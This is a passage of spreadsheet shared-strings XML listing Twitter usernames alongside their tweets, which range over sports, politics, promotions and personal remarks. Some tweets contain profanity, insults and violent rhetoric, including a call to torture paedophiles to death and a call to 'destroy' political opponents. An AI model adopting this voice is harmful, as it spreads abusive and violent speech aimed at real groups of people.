  <si>
    <t>Robertsawrey</t>
  </si>
  <si>
    <t>@alana33534686 A room full of hookers and a kilo of Cocain</t>
  </si>
  <si>
    <t>Briellaaaaa_</t>
  </si>
  <si>
    <t>If you love me, you'll watch Now &amp; Then with me. My all time favorite movie &amp; I'm forever grateful to @netflix for listening to me &amp; bringing it to my fingertipsssss! #NowAndThen</t>
  </si>
  <si>
    <t>SebastianHaze</t>
  </si>
  <si>
    <t>@AmazonWatch @LeilaniMunter If I were president I’d go to war over this, I’d stop that countries leaders from allowing this to happen, the Amazon is for the world, not just one country! I would take that guy out and stop the fires!</t>
  </si>
  <si>
    <t>bonesy2013</t>
  </si>
  <si>
    <t>@SuffolkRoyal @Boy1010Tory @Janiwink Exactly. When I started full time work at 16, it was all done retrospectively. Mum would keep a record of she spent on food etc ( no telephone or central heating then ) &amp; at end of each week it was divided 3 ways, I gave up one third &amp; mum n dad stood the rest. As it should be!</t>
  </si>
  <si>
    <t>RachelSmall32</t>
  </si>
  <si>
    <t>Limit how much you shape-shift to accommodate others. Although... More for Leo https://t.co/lTMq2RlA4K</t>
  </si>
  <si>
    <t>Ramonita0708</t>
  </si>
  <si>
    <t>Do you all see what this one man did?! The new reality is that every person who is a customer parking in a parking lot and shopping in a store will be treated like a potential criminal. Shopping will become like traveling on an air plain.</t>
  </si>
  <si>
    <t>Herschellk</t>
  </si>
  <si>
    <t>@MSamuels_LINY @realDonaldTrump He has sowed his own field the crops he has grown are nothing but his own. To blame anyone else is just a wonderful attempt at passing the buck. If he is such a leader and can't handle the criticism that comes with being POTUS than leave. Whiny Bitch! Grow a pair!</t>
  </si>
  <si>
    <t>TheodoreHerre15</t>
  </si>
  <si>
    <t>@JackKingston @nytimes Jack,Bret Stephens is the prime example of the Nevertrumper ‘House Conservative ‘</t>
  </si>
  <si>
    <t>DHH_Pastor</t>
  </si>
  <si>
    <t>@SleeperHQ missed the notification about giving away mascots over the next 24hrs? Details? 👍👍</t>
  </si>
  <si>
    <t>cmkirkrn</t>
  </si>
  <si>
    <t>@traciemac_Bmore Who were the reporters who ratted on her?</t>
  </si>
  <si>
    <t>joyfulnoyz</t>
  </si>
  <si>
    <t>@mrgillan9 @FredTJoseph I support Reparations for Latinx and Native Americans, but it should be kept separate. Combining POCs keeps Blacks/ADOS at the bottom. https://t.co/IerR4JUHA0</t>
  </si>
  <si>
    <t>CalvinEmeka</t>
  </si>
  <si>
    <t>@Holeap4 One thing I have noticed with this generation is they appear for 5 mins on radio or tv or write a blog for 3 weeks and they immediately think they know it all. Very dangerous for their future. Be humble and learn you’ll always be better for it.</t>
  </si>
  <si>
    <t>mcfc__ste</t>
  </si>
  <si>
    <t>@SpursOfficial VAR Again you horrible cheating B#stards the most horribile and hated club in London</t>
  </si>
  <si>
    <t>Nullcopilot</t>
  </si>
  <si>
    <t>@rickygervais So the beginning then?</t>
  </si>
  <si>
    <t>CroonerFriday</t>
  </si>
  <si>
    <t>@CBSNews There is no need for any further legislation that only infringes on our Rights. Criminals do not care about laws.</t>
  </si>
  <si>
    <t>a_hehir</t>
  </si>
  <si>
    <t>@kingarty_ Sorry Hun I don’t make the rules x</t>
  </si>
  <si>
    <t>iAmFlair519</t>
  </si>
  <si>
    <t>And now it's time for a smoke #BustedOpenCigarClub https://t.co/R9ZeHNxyXE</t>
  </si>
  <si>
    <t>SpookyFovvs</t>
  </si>
  <si>
    <t>@welefulwdw hehe😂 once everyone saw him come on the screen we all swerved</t>
  </si>
  <si>
    <t>ecohen691</t>
  </si>
  <si>
    <t>Did you know that women in prison are not supplied with feminine hygiene products &amp; must often resort to homemade solutions, putting their health at risk? I just signed a petition to put an end to this vile &amp; demeaning disgrace. Join me! SIGN NOW 👇🏼 https://t.co/4SHW9JSUs5</t>
  </si>
  <si>
    <t>docyeager</t>
  </si>
  <si>
    <t>BEST AMAZON SELLER (FREE-Limited Offer) Smith Wigglesworth A Soul Winner for Christ: I Will Make You A Fisher of Men Kindle Edition by Dr. Michael Yeager (Author) https://t.co/5QwHSEpxmg https://t.co/5QwHSEpxmg</t>
  </si>
  <si>
    <t>_thatgirlAB</t>
  </si>
  <si>
    <t>@thekidtk1 I thought you was carrying the cooler 🙃</t>
  </si>
  <si>
    <t>whiterosedave</t>
  </si>
  <si>
    <t>@BenoitG91 Wtf is Costa supposed to be doing? The Samba?</t>
  </si>
  <si>
    <t>iDavey</t>
  </si>
  <si>
    <t>@OneBaddDude I just feel like it has to be more than that. But hey, it could be.</t>
  </si>
  <si>
    <t>CarolineWRCB</t>
  </si>
  <si>
    <t>HISTORY DOCKS IN CHATTANOOGA: The USS LST 325 docked at Ross's Landing early Wednesday morning around 6:00, for an extended visit, and offer tours of the World War II Landing Ship Tank vessel. @WRCB https://t.co/XVMNqCwx5M</t>
  </si>
  <si>
    <t>TrashmouthRex</t>
  </si>
  <si>
    <t>@KittyPryde483 My pictures don’t even do it justice!! It’s jaw dropping and the bar and restaurants are attractions on their own. It’s like staying at The Line 🥰🥰</t>
  </si>
  <si>
    <t>BenefitPERX</t>
  </si>
  <si>
    <t>Pick a Package for the family and save on health and Lifestyle. https://t.co/GMsl8zkzxN Choose one for your business by contacting us: Email: info@benefitperx.com for special company pricing. Save with BenefitPERx https://t.co/rlUJDenrlx</t>
  </si>
  <si>
    <t>footlocker</t>
  </si>
  <si>
    <t>@IamMrFantastic we didn’t want to let you wait. The #EvolutionOfTheSwoosh Nike Sunburst pack just dropped early! Shop now. #BecauseSneakers</t>
  </si>
  <si>
    <t>spot60spot</t>
  </si>
  <si>
    <t>@mumofsoulnwhim @colonelhogans ...that’s one side of the discussion, but there is more to it than that.</t>
  </si>
  <si>
    <t>SkinnerJ91</t>
  </si>
  <si>
    <t>@RobDorsettSky @JackHousley_F1 there’s the plan then</t>
  </si>
  <si>
    <t>THEPEAK</t>
  </si>
  <si>
    <t>It's FREE FOR ALL FRIDAY on the Noon Hour Takeover, in concert with @urbanfare. @katnyko will be taking any and ALL requests, which means you will be loving every song. You can text her at 102777 or give her a call at 604-280-1027. LISTEN LIVE: https://t.co/MNttfBIeqH https://t.co/lzj9xRXKgn</t>
  </si>
  <si>
    <t>spookyscherer</t>
  </si>
  <si>
    <t>@babyczk LOVE U lmk who the fuck i gotta beat up</t>
  </si>
  <si>
    <t>TheBear222</t>
  </si>
  <si>
    <t>@darth_frog @chrisjackson193 @OwenJones84 Everything that happens that bad is far right according to them. With what’s going on in this country he wants to be thankful he wasn’t stabbed but he uses it as a publicity stunt.</t>
  </si>
  <si>
    <t>mintbearjr</t>
  </si>
  <si>
    <t>@Sablevirus @Ganonndorf14 please give the good boi the mount he deserves</t>
  </si>
  <si>
    <t>katiefoges</t>
  </si>
  <si>
    <t>HI #AussieEd. If your school has vertical curriculum, we'd love to know work with you and learn. Here's our version: https://t.co/gTn29ykSjJ</t>
  </si>
  <si>
    <t>comcastcares</t>
  </si>
  <si>
    <t>@CptSwollhouse Hey there, I'm certainly sorry to hear about the speed troubles. I can imagine this must be frustrating and I'd like to help. To get started, please DM your full address, first and last name, and the account holder’s name (if different).-CP</t>
  </si>
  <si>
    <t>Jwootheartist8</t>
  </si>
  <si>
    <t>We need a balanced leader of the free world who can be openly emotional at the same time And who does that typically best? Who can multi task, typically best? This is sociology USA, anatomy, biology, and psychology. A woman fits this. And add a millitant women....#19thAmendment</t>
  </si>
  <si>
    <t>inmaneagles</t>
  </si>
  <si>
    <t>Please come to Community Circle today from 7:30-8:00 and help us celebrate an amazing first week of school! #thinkinmaneagles https://t.co/JIRjXzYyIb</t>
  </si>
  <si>
    <t>English_Creek</t>
  </si>
  <si>
    <t>Tomorrow is Night 1 of the 15th Outlaw Dirt Kart Nationals at English Creek Speedway! A couple of reminders for Nationals: 1. To help make the check-in process go smoothly, please have transponder numbers READY! 2. Make sure transponders are charged properly. CONTINUED.... https://t.co/UpAGXoEZu4</t>
  </si>
  <si>
    <t>TempleofDagon</t>
  </si>
  <si>
    <t>@Stormcrowtweet I’m so very glad that they don’t. They are a perfect band as-is and clean vocals should be saved for some good ol’ traditional heavy metals</t>
  </si>
  <si>
    <t>Ssaaanchez</t>
  </si>
  <si>
    <t>sometimes i wish to wake up with straight hair and other days i don’t /: i hate me</t>
  </si>
  <si>
    <t>a_barbcosgrove</t>
  </si>
  <si>
    <t>@demonscythsynth @doomcock I do!!!!! I was also in the audience in opening weekend in 1977.</t>
  </si>
  <si>
    <t>MarianneSmith7</t>
  </si>
  <si>
    <t>@Twanda86701819 The original account has me blocked for some reason so that’s a no. 😔</t>
  </si>
  <si>
    <t>GasMaskGroyper</t>
  </si>
  <si>
    <t>BTW, final note... I really hate to say that he’s “balls deep in a kid somewhere already.” It’s a vile thought and I DETEST pedos. I think pedos should be tortured to death on PPV. But if this doesn’t make you wanna RAGE then you have no more life bubbling up inside of you.</t>
  </si>
  <si>
    <t>nae_golden</t>
  </si>
  <si>
    <t>i’m up early</t>
  </si>
  <si>
    <t>susfree</t>
  </si>
  <si>
    <t>Hey @Cal, Thank you for the follow!</t>
  </si>
  <si>
    <t>ejaju</t>
  </si>
  <si>
    <t>Fitting for Kobe day @Cybersole @proxywowcom @theKickStation https://t.co/yP3DbqVPG0</t>
  </si>
  <si>
    <t>harrahsbartend</t>
  </si>
  <si>
    <t>@Phillies GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO GABE HAS GOT TO GO. ODUBEL MUST GO TOO</t>
  </si>
  <si>
    <t>yanbsitg</t>
  </si>
  <si>
    <t>i could be about to die and still gonna go to work</t>
  </si>
  <si>
    <t>fadumeeena</t>
  </si>
  <si>
    <t>@ezr610 big factsssss, do you know how much i would kill for a sis pls 😪 but alhamdulillah 🥺</t>
  </si>
  <si>
    <t>itspeterj</t>
  </si>
  <si>
    <t>I'm so bad with song lyrics I didn't realize the names changed in "happy birthday" until last week.</t>
  </si>
  <si>
    <t>TheBearNecessit</t>
  </si>
  <si>
    <t>@PadraigSionnaig @Chris_Jack89 Does he represent the entire Celtic support? https://t.co/JYmgavqzoa</t>
  </si>
  <si>
    <t>KatFtAV</t>
  </si>
  <si>
    <t>Working on the third illustration for the little pig story... #illustrationartistNSB #childrensbookart #kayteesparxdotcom #katfluhartyart #watercolorpenandinkandpaper @ New Smyrna Beach, Florida https://t.co/oMj6FsjK6T</t>
  </si>
  <si>
    <t>RekaayahX</t>
  </si>
  <si>
    <t>@Lanese_shantel that’s all i’m striving for, thank you!💛</t>
  </si>
  <si>
    <t>Snoodit</t>
  </si>
  <si>
    <t>@kendalljamaal Hit me up when you watch the finale.</t>
  </si>
  <si>
    <t>WinonaMcCormic7</t>
  </si>
  <si>
    <t>@askSageUKI I need a contact number for accessing payslips please</t>
  </si>
  <si>
    <t>Beaux_Banks</t>
  </si>
  <si>
    <t>Oh and pandas....I really like pandas</t>
  </si>
  <si>
    <t>Dashtruck</t>
  </si>
  <si>
    <t>Vegetable fritters today! Comes with chickpea salad and tahini sauce. Lots of other vegetable stuff too. Also fried pork and beef brisket if that is more your thing. Union Street Basketball Court 11-2pm.… https://t.co/qTbi2Fovc8</t>
  </si>
  <si>
    <t>geniaus</t>
  </si>
  <si>
    <t>@chroniques92 There is a suggestion in the Ambassadors Group on Facebook. I have bought from PCNameTag in the US.</t>
  </si>
  <si>
    <t>Lisamcgonagle</t>
  </si>
  <si>
    <t>The Labor Market’s Weak Spot: Jobs Making Stuff https://t.co/yxRlCSrGGK</t>
  </si>
  <si>
    <t>@andrew_lilico Reported for *more* threats.</t>
  </si>
  <si>
    <t>Eden_Shopping</t>
  </si>
  <si>
    <t>Get creative with @BillsRestaurant on 17th September at their craft night, 6pm! For only £29 per person you will learn how to use upcycled materials to make your own beautiful windchime, enjoy 2 courses from Bill’s seasonal set menu PLUS a drink on arrival https://t.co/h3kae3l5gM https://t.co/xdFkXhqz1G</t>
  </si>
  <si>
    <t>JudyDawn</t>
  </si>
  <si>
    <t>@craytusjones Oh shit! I thought you had the devil on lockdown too. You tease, now I’ll be up all night. 🥺😜</t>
  </si>
  <si>
    <t>deicosart</t>
  </si>
  <si>
    <t>I'm also going to add the reverse to this. Don't cosplay a character your friend wants you to do so that you can later hold it over them to make them do what you want and make them feel guilty. No one should feel forced to ever cosplay anything regardless of the situation.</t>
  </si>
  <si>
    <t>EveryPolice</t>
  </si>
  <si>
    <t>⠀ ⠀ ⠀ 👮 　 🇭🇲🇭🇲🇭🇲 🇭🇲 🇭🇲　🇭🇲 👇 🇭🇲🇭🇲 👇 　 🇭🇲　🇭🇲 　 🇭🇲　 🇭🇲 　 👢 👢 howdy. i'm the police officer of Heard &amp; McDonald Islands</t>
  </si>
  <si>
    <t>dubslugg</t>
  </si>
  <si>
    <t>@TVLine @BrandonJRouth Two series regulars and 65% of audiences</t>
  </si>
  <si>
    <t>adshubert</t>
  </si>
  <si>
    <t>@gtconway3d @realDonaldTrump He (Ivanka or Pascale or Scavino or Bongino or whoever types this drivel) sounds like a 9 year old. It's so simplistic and pedestrian, he is undermined not just by his incompetence but this utterly absurdist expressionism.</t>
  </si>
  <si>
    <t>Jay33479104</t>
  </si>
  <si>
    <t>@JonMoxley No apology necessary Mox. As all your fans are saying, your health is most important. If anything, this makes you vs Omega that much bigger and more anticipated</t>
  </si>
  <si>
    <t>NatNatcha87</t>
  </si>
  <si>
    <t>@mushyart Twilight Forest if you enjoy a multi-tiered fantasy-RPG-themed experience+Ice &amp; Fire for DRAGONS</t>
  </si>
  <si>
    <t>Trojanmachine</t>
  </si>
  <si>
    <t>Part 2 of 2... See this and more at: https://t.co/MLgH4VEyeK https://t.co/fS3uAlGzyM</t>
  </si>
  <si>
    <t>billetskillet</t>
  </si>
  <si>
    <t>@higgzorz watching worth it and they're doing the most expensive fried chicken bit and these guys spent, a whole 3 minute montage on how good this shit is</t>
  </si>
  <si>
    <t>Pea_Pock</t>
  </si>
  <si>
    <t>@realDonaldTrump Folks without a pot to piss in, and no tangible immigrants to blame it on, realize the window to throw it out of ain’t free either.</t>
  </si>
  <si>
    <t>ServicesFx</t>
  </si>
  <si>
    <t>triangle done...moving onto the next #eurusd https://t.co/IxVnf34H02</t>
  </si>
  <si>
    <t>casepov</t>
  </si>
  <si>
    <t>What lurks behind life's superficialities? Play #PhaseTransition #EverythingIsConnected &amp; find out who can &amp; can't be trusted. Who here did I have another bad dream about last night? And who was nicknamed Archug? ▶️. https://t.co/CyJwaWLIsn ▶️. https://t.co/cfiM9lTVxy https://t.co/xoQlnMaQGY</t>
  </si>
  <si>
    <t>LMercadoLopez</t>
  </si>
  <si>
    <t>@escribescribe I used to teach this in my memoir class. Loved it!!</t>
  </si>
  <si>
    <t>streamuwatch</t>
  </si>
  <si>
    <t>Going live at 5:30 to make our way through Sin and do some post game battles! https://t.co/yTl4iaeTfn</t>
  </si>
  <si>
    <t>PoppyScotInAZ</t>
  </si>
  <si>
    <t>@Franklin_Graham Your Messiah, @realDonaldTrump, revels in, and encourages, this hate... have you bared witness to any of his #MAGA rallies? They are nothing but people doing vitriol and assaulting non-believers. And you, by continuing to support him, are complicit. You are part of the reason.</t>
  </si>
  <si>
    <t>sinforsin_</t>
  </si>
  <si>
    <t>hm where to smoke at today? i wanna soak up as much sun as possible 💛</t>
  </si>
  <si>
    <t>TheBiggerJohn</t>
  </si>
  <si>
    <t>When you suddenly get inspired to record dumb shit Vol. 2 https://t.co/WUxvRs64NY</t>
  </si>
  <si>
    <t>Thuzie</t>
  </si>
  <si>
    <t>@michaelschweitz I expect a lot of the Rs wouldn’t be here if not for incest.</t>
  </si>
  <si>
    <t>idaho_boss</t>
  </si>
  <si>
    <t>@Thalia_Nyx @SlotsOfDoom @thedailybeast Yup. My son is a gamer, also. Sees the same thing. I think our sons would get along 😉</t>
  </si>
  <si>
    <t>Scottro03148880</t>
  </si>
  <si>
    <t>will either go to $0 or $1,000,000. There is no middle ground. And with all the recent news, development, falling economies and government embracement I think I know which way this is going! Interested one should Follow the link below 👉 https://t.co/fzDGpJNSGE https://t.co/4b6K8WEJQs</t>
  </si>
  <si>
    <t>BertFC_xbox</t>
  </si>
  <si>
    <t>@FaZeKay Im a COD sniper. Been sniping for 6+ years. I can bring whatever you need... Much love #FaZeUp</t>
  </si>
  <si>
    <t>IAMBEAST305</t>
  </si>
  <si>
    <t>I’m fighting #HurricaneDorian for my next video coming up 😂</t>
  </si>
  <si>
    <t>rabbit0heart</t>
  </si>
  <si>
    <t>Going to buy another spinning wheel. First I need to get rid of stuff (sell or discard). My craft stuff needs to fit in the closet, and I need to sort other boxes of stuff I probably don’t need.</t>
  </si>
  <si>
    <t>Robthetalentma1</t>
  </si>
  <si>
    <t>To all those Yankee fans gloating about the MLB season. This will happen again very very soon :) Enjoy rooting for the Jets or Giants or bills https://t.co/6hSIcgMvxG</t>
  </si>
  <si>
    <t>FGCUWxSTEM</t>
  </si>
  <si>
    <t>It's a hot one at Florida Gulf Coast University! The Heat Index is a blistering 108.0 degrees F. Stay cool and drink plenty of fluids.</t>
  </si>
  <si>
    <t>ptheoph</t>
  </si>
  <si>
    <t>@Serremmy @Searod3 @BundyGP @etcb1102 @RodHillis1 @MMchiara @Da_Splitzz @CristoQat7 @terrryiacone @johnson20_j @QmagaMike @LadyNY4Ever @Kennethjpl76 @LeeBellHood1 @DananaMama @CookedHillary @JOHNTPOTTS1 @wmspeakshare @chuck_rowland @MrJOHNWICK2 @SupportPOTUSDJT So they desecrate the very symbol that allows them the opportunity to act like jack asses in public. Bet they’re all collecting welfare thanks to that flag. Like to see them try that in Iran or Venezuela or China (mainland) or Cuba. They would be disappeared. What geniuses.</t>
  </si>
  <si>
    <t>sol_orwell</t>
  </si>
  <si>
    <t>@lilyraynyc @randfish They also bought https://t.co/s37pQm6NH7 and folded it into HL. AN was at several *hundreds* of thousands of visitors a day from G.</t>
  </si>
  <si>
    <t>Kenisntblue</t>
  </si>
  <si>
    <t>@joshjhonbob @Pokemon Yet no one is here. which is what i'm saying. i know where you're coming from but you're starting a loaded argument on nothing rn. like i've said, at least have this argument if you see it here in the comments. not start it yourself, because then you're part of the problem.</t>
  </si>
  <si>
    <t>xrileyjox</t>
  </si>
  <si>
    <t>not until we are lost, do we begin to understand ourselves</t>
  </si>
  <si>
    <t>LA_Way</t>
  </si>
  <si>
    <t>Going through a full day of work with 2 hours sleep when they've decided studio lights are off is going to be tough.</t>
  </si>
  <si>
    <t>CEK1st</t>
  </si>
  <si>
    <t>@Liz_Wheeler @QualityTweets78 Wow, she just described how she built a coalition and won her election. I sure hope her followers see her for who she is. That breathe of fresh air the Democrats thought she was, has now turn into a nightmare for them. She is a hater and she relies on racism!</t>
  </si>
  <si>
    <t>TWKftw</t>
  </si>
  <si>
    <t>@abarber1 @DanOBrienPoker @drmistercody @Quillette I'm not fighting him. Just making sure he knows that outlet is a joke. And pointing out that I think being detached right now is supporting evil.</t>
  </si>
  <si>
    <t>skyxelayla</t>
  </si>
  <si>
    <t>those Bitmoji stories on snapchat are actually ridiculous but I genuinely laugh for about 30 minutes after watching them</t>
  </si>
  <si>
    <t>pierrettechamp2</t>
  </si>
  <si>
    <t>#johnreese #reeselives #jimcaviezel #PersonOfInterest Today's Sunshine! Have a Great and Beautiful Saturday, Everybody! https://t.co/zAGspg7Mp7</t>
  </si>
  <si>
    <t>nini4x</t>
  </si>
  <si>
    <t>If you think im pussy the fade always free 🤷🏽‍♀️</t>
  </si>
  <si>
    <t>MommyUnit</t>
  </si>
  <si>
    <t>@JeffTheGK @RedpilledRuth @LindsayBruehl @OldReepicheep @BethMooreLPM I provided information. You wouldn’t accept said information. I can’t help that. You just make me sad. However, the other thing you do is make me resolved to help those targeted and endangered in my community. I’m grateful for that energy to work.</t>
  </si>
  <si>
    <t>LexiiAnn14</t>
  </si>
  <si>
    <t>@gmarcelle7 I’m from Arizona about to go to Kansas with my husband for the army lol</t>
  </si>
  <si>
    <t>DaphneHarridge</t>
  </si>
  <si>
    <t>@pedoslightemup @lisakitter @craigzimmerman6 @mchooyah Hilda, phones aren't more important, but if there's the slightest chance someone might forget a child, where's the harm in doing whatever it takes, no matter how silly, to prevent that from happening?</t>
  </si>
  <si>
    <t>Alethia_J</t>
  </si>
  <si>
    <t>I have learned to allow relationships to happen form organically. We all have desires to be connected to certain people if it’s meant it will happen and not be forced. I highly recommend… https://t.co/sbM5KLgeXF</t>
  </si>
  <si>
    <t>RubyLeeWrites</t>
  </si>
  <si>
    <t>@nickybdamaged @pseudofauxtome I use my own name because it gives me more intense warm and fuzzies!</t>
  </si>
  <si>
    <t>NursGibson49</t>
  </si>
  <si>
    <t>@AbbyJohnson Switzerland is interesting. Mandatory military service. Military on discharge may purchase the gun. The country encourages being trained &amp; tested starting young. They have strict regulations by local government listing all people with guns. Low gun crime</t>
  </si>
  <si>
    <t>TocquevilleJnr</t>
  </si>
  <si>
    <t>Well said @RomeshRanga : “Statements like this make the experience of visible minorities in Britain significantly worse” Finally @guardian article recognising BAME have far worse racist experiences than some others ... (though you’d struggle to know it) https://t.co/ubxG8rP6f4</t>
  </si>
  <si>
    <t>HandsomeVeez</t>
  </si>
  <si>
    <t>I be bout to quit FedEx everyday with they sweet ass</t>
  </si>
  <si>
    <t>joshisnothome</t>
  </si>
  <si>
    <t>@cardinalsgifs @TheAthleticSTL @stlCupofJoe I don’t unfortunately, but I may consider getting it to read that piece. His turnaround has been ridiculous. The pitching version of 2018 Carpenter</t>
  </si>
  <si>
    <t>StephenBurchard</t>
  </si>
  <si>
    <t>Thanks to everyone who came to my Ice Cream Social! One of my signature Gratitude Events. What a fun time. I deeply appreciate those who trust me and help my business grow! Thank you David Bermudez of La Michoacana… https://t.co/qjYQFtoeXl</t>
  </si>
  <si>
    <t>RadioSyh</t>
  </si>
  <si>
    <t>@AndrewRVH @cringesmcbaske2 @nikonokotv @NBAonTNT You’re probably right I don’t see him beating out Burke or Shake Milton for minutes just bc he can shoot. People on Twitter over value that shot</t>
  </si>
  <si>
    <t>Astro_Anthony</t>
  </si>
  <si>
    <t>@OSIRISREx the PNW native american mythology involving the thunderbird</t>
  </si>
  <si>
    <t>JordanW41069857</t>
  </si>
  <si>
    <t>@David_Mahfood @johnmilbank3 @DanielWHouck @EOrthodoxy Not sure how it can be one act if the later necessity isn't itself a feature of the original act. Can the same act be both unnecessary and necessary? Who imposes the conditions that change its inherent character?</t>
  </si>
  <si>
    <t>AbstractLife</t>
  </si>
  <si>
    <t>@VdotL Had this lil 21 y/o dude hop in my mentions last week asking me "wHaT mY oLd aSs wAs dOiNg oN tWiTtEr". I told him I've been in the Twitter game since he was 10 y/o and to scram lol</t>
  </si>
  <si>
    <t>AmazingLover96</t>
  </si>
  <si>
    <t>I am proud to announce that Raising Hell is finally complete. It is currently in the process of being edited. It has been quite a Journey over the past 5 years. I cant believe i wrote this book 6 times in 5 years. It will be published on @amazon this fall. #WritingCommnunity</t>
  </si>
  <si>
    <t>Tomgreenwood78</t>
  </si>
  <si>
    <t>@richsharpe89 how come we aren’t prepared to spend on a decent centre back when Waggott has said we have a similar budget to last year (£10m net spend). This season we have a net spend of £1.5m so Surely there’s money there to be spent unless we’ve been lied too by Waggott?</t>
  </si>
  <si>
    <t>Deebreeze3420</t>
  </si>
  <si>
    <t>Run dat shit up u just runnin yo mouth 😬🤑</t>
  </si>
  <si>
    <t>NoDisChey_</t>
  </si>
  <si>
    <t>I messed up and let Jr have a taste of Peach Tea Lemonade. SOS! 😩</t>
  </si>
  <si>
    <t>jeffmckeand</t>
  </si>
  <si>
    <t>@drewholcomb We've been fans ever since, learning to play and sing your music together, going to your shows, and occasionally randomly running into you and @ellieholcomb... https://t.co/6CN9lMG9Cs</t>
  </si>
  <si>
    <t>kaylxjay</t>
  </si>
  <si>
    <t>I’m gonna try this whole freelance working for myself thing. Lettuce see how it goes</t>
  </si>
  <si>
    <t>SharonZurcher</t>
  </si>
  <si>
    <t>@Andwejigglelike @jimmyfallon I'm so excited for you, I know you'll have a amazing time..seeing NYC for the first time is always increable 🗽</t>
  </si>
  <si>
    <t>Chi20Something</t>
  </si>
  <si>
    <t>Get Discounted Tix to Chicago’s BEST Halloween Events! Tix start at just $10 &amp; group rates are available! Buy NOW before prices increase at https://t.co/zMDNSEm8nJ! Celebrate your birthday at one of the event &amp; your tix is free! Email Info@ChicagoHalloweenTix.com for more info! https://t.co/kFOukwzKKd</t>
  </si>
  <si>
    <t>HaughtyTrex</t>
  </si>
  <si>
    <t>Hey Christina(@Christi96639029), thank you for following me</t>
  </si>
  <si>
    <t>Jrod940</t>
  </si>
  <si>
    <t>@CNN FYI cnn. Florida has, had and will have gators until that merciful asteroid puts us all out of our misery.</t>
  </si>
  <si>
    <t>RichiyGraves</t>
  </si>
  <si>
    <t>If Trump somehow wins in 2020 then that will tell us all we need to know about America and its citizens</t>
  </si>
  <si>
    <t>StreamSpinner</t>
  </si>
  <si>
    <t>@wasocu1 - Wacky Southern Current - Come and See is now playing on MPG Radios.. Innovative Music Mix - https://t.co/kFGnH9qulp Our Music has streamed content to over 46,0977 listener connections.</t>
  </si>
  <si>
    <t>Jahmad_1der</t>
  </si>
  <si>
    <t>I’m gradually gettin into this herbal life. Bought hella fruits from the grocery sto. Bouta grab me a smoothie and some Salata</t>
  </si>
  <si>
    <t>vanthefirst</t>
  </si>
  <si>
    <t>@LetsXmen I love this. I don’t know why. Feels like they’re a team again. Back to the an update of the original dream</t>
  </si>
  <si>
    <t>7NewsSydney</t>
  </si>
  <si>
    <t>Australia's biggest windfarm has been switched on in the Darling Downs. 50 of a total 123 turbines are now producing power. #7NEWS https://t.co/rrWajOKyLF</t>
  </si>
  <si>
    <t>kemoON_28</t>
  </si>
  <si>
    <t>@majeed_wadi @palestizian The Sudanese ppl appreciate beauty so they are here 😂😂😂</t>
  </si>
  <si>
    <t>G0TH_GUTS</t>
  </si>
  <si>
    <t>My mom threatened to ground me because I did the dishes the morning instead of last night..... I am 22 yrs old😭😭😭 wth</t>
  </si>
  <si>
    <t>AnarchyBea</t>
  </si>
  <si>
    <t>I can feel the air around me converting to gay air uwu</t>
  </si>
  <si>
    <t>MightyLindelof</t>
  </si>
  <si>
    <t>@wauraxd Actually I got Lovely Jubbly from Giffgaff, they use to send me a message saying that when I topped up etc.</t>
  </si>
  <si>
    <t>UKAnglosphere</t>
  </si>
  <si>
    <t>@OwenJones84 We must all destroy these socialist traitors in our country. They work for instability and chaos. They work against democracy and the UK. They have betrayed the country too many times since brexit. They are hypocrite millionaires. Hardly any socialists are working class.</t>
  </si>
  <si>
    <t>NRL</t>
  </si>
  <si>
    <t>Press Conference for #NRLRoostersPanthers Press Conference 🎥 https://t.co/GE5JgyZIh6 https://t.co/oq8fBxl3K8</t>
  </si>
  <si>
    <t>kendaljennya</t>
  </si>
  <si>
    <t>Download Mobi Robert Menzies: the art of politics &gt;&gt; https://t.co/VPRyFvjDNt</t>
  </si>
  <si>
    <t>StephenRWade3</t>
  </si>
  <si>
    <t>@gmbutts Academia at its Finest!! Keep Throwing Out the Bullshit un factual Propoganda and “Stay Employed”?? Pathetic and Tiresome.</t>
  </si>
  <si>
    <t>usmandarpak</t>
  </si>
  <si>
    <t>@Matiullahjan919 Mehwish hayat aur ch fawad both in Norway as you know ch fawad nominate her for pride of performance... u know what I mean</t>
  </si>
  <si>
    <t>devsaintlaurent</t>
  </si>
  <si>
    <t>OMG LMAOO edwin was right i really am the worst tweeter</t>
  </si>
  <si>
    <t>TheCityClub</t>
  </si>
  <si>
    <t>We're back at @HappyDog58! Join us on Tuesday, September 10 for a FREE discussion on the conflict over Kashmir. What goes best with hot dogs and world affairs? Maybe some tater tots- but we'll let you decide. https://t.co/IaFeG7G5px</t>
  </si>
  <si>
    <t>memoryendowment</t>
  </si>
  <si>
    <t>I WAS AT HOME, BUT: floating ideas about resentment and frustrations with inescapable patriarchal frameworks in the face of change and grief, but as expected from Schanelec, this is more of a thing that just is, and when it moved me, I tried not to question the feeling. #MIFF2019</t>
  </si>
  <si>
    <t>MackDaddyy</t>
  </si>
  <si>
    <t>@JuicyJ_CR @trbjmonte Still is pretty easy to get guns</t>
  </si>
  <si>
    <t>jessakox</t>
  </si>
  <si>
    <t>I accidentally put on the foundation I use for stage makeup (aka a foundation that is 2 shades darker than my actual skin tone because stage lights make me look ill) and i looked like a reverse clown</t>
  </si>
  <si>
    <t>painter87048</t>
  </si>
  <si>
    <t>Thanks "Patrick Randall" For Following Me !!! https://t.co/6AEX8LYTj6</t>
  </si>
  <si>
    <t>KimberCosch</t>
  </si>
  <si>
    <t>@WickedWalnut I have many pics with various angles. I even said to my dad’s friends after I first found it “Anyone wanna see some more morbid shit?” ::silence:: As they were drinking outside. 🤣😂😂</t>
  </si>
  <si>
    <t>shannmcg1</t>
  </si>
  <si>
    <t>@RSM5AMR @PimlottPhilip @RAMCRepSM Thankyou so much for taking the time to reply to my post! Yeah I’ve been training army style not civilian style so heavy weighted walks and heavy weighted runs and I’m meeting 2 of the fitness requirements already so I will keep working toward it.Thankyou again!</t>
  </si>
  <si>
    <t>dhsands</t>
  </si>
  <si>
    <t>Gartner analyst, Graham Waller advises CIO’s to become “cultural hackers” encouraging a shift in organizational mindset. “The tool that needs upgrading is not software...It’s the mindset, the unseen processes that automatically turn on/off in response to a task or a situation.”</t>
  </si>
  <si>
    <t>sryantribune</t>
  </si>
  <si>
    <t>Good start for #Illini who score on first drive of season with a 3-yard Reggie Corbin run. 7-0 over Akron.</t>
  </si>
  <si>
    <t>qeios</t>
  </si>
  <si>
